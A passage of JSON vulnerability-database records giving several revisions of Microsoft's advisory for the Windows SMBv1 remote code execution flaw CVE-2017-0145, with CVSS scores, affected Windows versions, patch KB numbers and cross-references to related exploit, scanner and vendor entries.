"idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB3212646", "KB4012216", "KB4012214", "KB4012213", "KB3205401", "KB3177186", "KB4014077", "KB4012212", "KB3210720", "KB3210721", "KB4012217", "KB3205409", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB4012598", "KB3213986", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 
2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, 
{"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": 
"Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T08:51:23", "differentElements": ["msAffectedSoftware"], "edition": 80}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-29T10:45:17", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", 
"700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB4014077", "KB3210720", "KB3212646", "KB4012215", "KB4012216", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB4012217", "KB4013198", "KB3177186", "KB4012212", "KB3205409", "KB4012598", "KB3205401", "KB3213986", "KB4012213", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 
3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 
8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T10:45:17", "differentElements": ["msAffectedSoftware"], "edition": 81}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability 
exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-30T06:48:04", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", 
"PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3213986", "KB4012606", "KB4013429", "KB4012598", "KB3177186", "KBMS16-110, 3187754", "KB4012212", "KB4013198", "KB3205409", "KB4012216", "KB3212646", "KB4012215", "KB4012217", "KB3205401", "KB4012214", "KB3210721", "KB3210720", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": 
""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 